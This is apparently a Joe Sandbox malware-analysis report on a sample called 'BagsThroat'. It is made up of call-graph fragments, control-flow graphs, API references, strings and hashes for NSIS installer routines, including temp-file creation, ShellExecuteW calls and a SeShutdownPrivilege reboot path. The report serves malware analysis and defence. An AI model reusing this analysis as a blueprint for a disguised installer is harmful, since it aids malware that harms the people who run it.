4032eb 4087->4089 4088->4089 4089->3974 4093 403311 CreateDialogParamW ShowWindow 4090->4093 4094 403334 4090->4094 4098 40635e 4091->4098 4093->4094 4094->3974 4096->3980 4097->3981 4099 40637b PeekMessageW 4098->4099 4100 406371 DispatchMessageW 4099->4100 4101 403301 4099->4101 4100->4099 4101->3974 4103 403ed5 4102->4103 4118 405f7d wsprintfW 4103->4118 4105 403f49 4106 406831 18 API calls 4105->4106 4107 403f55 SetWindowTextW 4106->4107 4108 403f70 4107->4108 4109 403f8b 4108->4109 4110 406831 18 API calls 4108->4110 4109->4004 4110->4108 4111->4000 4112->4006 4119 406035 lstrcpynW 4113->4119 4115 403eb4 4116 40674e 3 API calls 4115->4116 4117 403eba lstrcatW 4116->4117 4117->4026 4118->4105 4119->4115 4121 403cbd 4120->4121 4122 4038a2 4121->4122 4123 403cc2 FreeLibrary GlobalFree 4121->4123 4124 406cc7 4122->4124 4123->4122 4123->4123 4125 4067aa 18 API calls 4124->4125 4126 406cda 4125->4126 4127 406ce3 DeleteFileW 4126->4127 4128 406cfa 4126->4128 4167 4038ae CoUninitialize 4127->4167 4129 406e77 4128->4129 4171 406035 lstrcpynW 4128->4171 4135 406301 2 API calls 4129->4135 4155 406e84 4129->4155 4129->4167 4131 406d25 4132 406d39 4131->4132 4133 406d2f lstrcatW 4131->4133 4136 40677d 2 API calls 4132->4136 4134 406d3f 4133->4134 4138 406d4f lstrcatW 4134->4138 4140 406d57 lstrlenW FindFirstFileW 4134->4140 4137 406e90 4135->4137 4136->4134 4141 40674e 3 API calls 4137->4141 4137->4167 4138->4140 4139 4062cf 11 API calls 4139->4167 4144 406e67 4140->4144 4168 406d7e 4140->4168 4142 406e9a 4141->4142 4145 4062cf 11 API calls 4142->4145 4143 405d32 CharNextW 4143->4168 4144->4129 4146 406ea5 4145->4146 4147 405e5c 2 API calls 4146->4147 4148 406ead RemoveDirectoryW 4147->4148 4152 406ef0 4148->4152 4153 406eb9 4148->4153 4149 406e44 FindNextFileW 4151 406e5c FindClose 4149->4151 4149->4168 4151->4144 4154 404f9e 25 API calls 4152->4154 4153->4155 4156 406ebf 4153->4156 4154->4167 4155->4139 4158 4062cf 11 API calls 4156->4158 4157 4062cf 11 API calls 4157->4168 4159 406ec9 4158->4159 4162 404f9e 25 API calls 4159->4162 4160 406cc7 72 API calls 4160->4168 4161 405e5c 2 API calls 4163 406dfa DeleteFileW 4161->4163 4164 406ed3 4162->4164 4163->4168 4165 406c94 42 API calls 4164->4165 4165->4167 4166 404f9e 25 API calls 4166->4149 4167->3909 4167->3910 4168->4143 4168->4149 4168->4157 4168->4160 4168->4161 4168->4166 4169 404f9e 25 API calls 4168->4169 4170 406c94 42 API calls 4168->4170 4172 406035 lstrcpynW 4168->4172 4169->4168 4170->4168 4171->4131 4172->4168 4173->4058 4929 401cb2 4930 40145c 18 API calls 4929->4930 4931 401c54 4930->4931 4932 4062cf 11 API calls 4931->4932 4933 401c64 4931->4933 4934 401c59 4932->4934 4935 406cc7 81 API calls 4934->4935 4935->4933 3705 4021b5 3706 40145c 18 API calls 3705->3706 3707 4021bb 3706->3707 3708 40145c 18 API calls 3707->3708 3709 4021c4 3708->3709 3710 40145c 18 API calls 3709->3710 3711 4021cd 3710->3711 3712 40145c 18 API calls 3711->3712 3713 4021d6 3712->3713 3714 404f9e 25 API calls 3713->3714 3715 4021e2 ShellExecuteW 3714->3715 3716 40221b 3715->3716 3717 40220d 3715->3717 3718 4062cf 11 API calls 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 402230 3718->3720 3719->3716 4936 402238 4937 40145c 18 API calls 4936->4937 4938 40223e 4937->4938 4939 4062cf 11 API calls 4938->4939 4940 40224b 4939->4940 4941 404f9e 25 API calls 4940->4941 4942 402255 4941->4942 4943 405c6b 2 API calls 4942->4943 4944 40225b 4943->4944 4945 4062cf 11 API calls 4944->4945 4953 4022ac CloseHandle 4944->4953 4950 40226d 4945->4950 4947 4030e3 4948 402283 WaitForSingleObject 4949 402291 GetExitCodeProcess 4948->4949 4948->4950 4952 4022a3 4949->4952 4949->4953 4950->4948 4951 40635e 2 API calls 4950->4951 4950->4953 4951->4948 4955 405f7d wsprintfW 4952->4955 4953->4947 4955->4953 4956 404039 4957 404096 4956->4957 4958 404046 lstrcpynA lstrlenA 4956->4958 4958->4957 4959 404077 4958->4959 4959->4957 4960 404083 GlobalFree 4959->4960 4960->4957 4961 401eb9 4962 401f24 4961->4962 4965 401ec6 4961->4965 4963 401f53 GlobalAlloc 4962->4963 4967 401f28 4962->4967 4969 406831 18 API calls 4963->4969 4964 401ed5 4968 4062cf 11 API calls 4964->4968 4965->4964 4971 401ef7 4965->4971 4966 401f36 4985 406035 lstrcpynW 4966->4985 4967->4966 4970 4062cf 11 API calls 4967->4970 4980 401ee2 4968->4980 4973 401f46 4969->4973 4970->4966 4983 406035 lstrcpynW 4971->4983 4975 402708 4973->4975 4976 402387 GlobalFree 4973->4976 4976->4975 4977 401f06 4984 406035 lstrcpynW 4977->4984 4978 406831 18 API calls 4978->4980 4980->4975 4980->4978 4981 401f15 4986 406035 lstrcpynW 4981->4986 4983->4977 4984->4981 4985->4973 4986->4975

                                        Executed Functions

                                        Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                        • ShowWindow.USER32(00000000), ref: 00405313
                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                        • CreatePopupMenu.USER32 ref: 004053A2
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                        • EmptyClipboard.USER32 ref: 0040543D
                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                        • CloseClipboard.USER32 ref: 0040549A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                        • String ID: New install of "%s" to "%s"${
                                        • API String ID: 2110491804-1641061399
                                        • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                        • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                        Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                        APIs
                                        • #17.COMCTL32 ref: 004038CE
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                        • API String ID: 2435955865-3712954417
                                        • Opcode ID: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                        • Opcode Fuzzy Hash: 948e77a094ed8d3dc351abf73424f69382ec6f0ad9ab58a25f58455ddc2a0a57
                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                        Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 587 406831-40683c 588 40683e-40684d 587->588 589 40684f-406863 587->589 588->589 590 406865-406872 589->590 591 40687b-406881 589->591 590->591 592 406874-406877 590->592 593 406887-406888 591->593 594 406aad-406ab6 591->594 592->591 597 406889-406896 593->597 595 406ac1-406ac2 594->595 596 406ab8-406abc call 406035 594->596 596->595 599 406aab-406aac 597->599 600 40689c-4068ac 597->600 599->594 601 4068b2-4068b5 600->601 602 406a86 600->602 603 406a89 601->603 604 4068bb-4068f9 601->604 602->603 605 406a99-406a9c 603->605 606 406a8b-406a97 603->606 607 406a19-406a22 604->607 608 4068ff-40690a GetVersion 604->608 611 406a9f-406aa5 605->611 606->611 609 406a24-406a27 607->609 610 406a5b-406a64 607->610 612 406928 608->612 613 40690c-406914 608->613 617 406a37-406a46 call 406035 609->617 618 406a29-406a35 call 405f7d 609->618 615 406a72-406a84 lstrlenW 610->615 616 406a66-406a6d call 406831 610->616 611->597 611->599 614 40692f-406936 612->614 613->612 619 406916-40691a 613->619 621 406938-40693a 614->621 622 40693b-40693d 614->622 615->611 616->615 626 406a4b-406a51 617->626 618->626 619->612 625 40691c-406920 619->625 621->622 627 406979-40697c 622->627 628 40693f-406965 call 405eff 622->628 625->612 630 406922-406926 625->630 626->615 631 406a53-406a59 call 406064 626->631 633 40698c-40698f 627->633 634 40697e-40698a GetSystemDirectoryW 627->634 641 406a05-406a09 628->641 642 40696b-406974 call 406831 628->642 630->614 631->615 638 406991-40699f GetWindowsDirectoryW 633->638 639 4069fb-4069fd 633->639 637 4069ff-406a03 634->637 637->631 637->641 638->639 639->637 643 4069a1-4069ab 639->643 641->631 645 406a0b-406a17 lstrcatW 641->645 642->637 646 4069c5-4069db SHGetSpecialFolderLocation 643->646 647 4069ad-4069b0 643->647 645->631 649 4069f6-4069f8 646->649 650 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 646->650 647->646 648 4069b2-4069b9 647->648 652 4069c1-4069c3 648->652 649->639 650->637 650->649 652->637 652->646
                                        APIs
                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406A73
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 3581403547-1792361021
                                        • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                        • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                        Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 856 406301-406315 FindFirstFileW 857 406322 856->857 858 406317-406320 FindClose 856->858 859 406324-406325 857->859 858->859
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: jF
                                        • API String ID: 2295610775-3349280890
                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                        Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
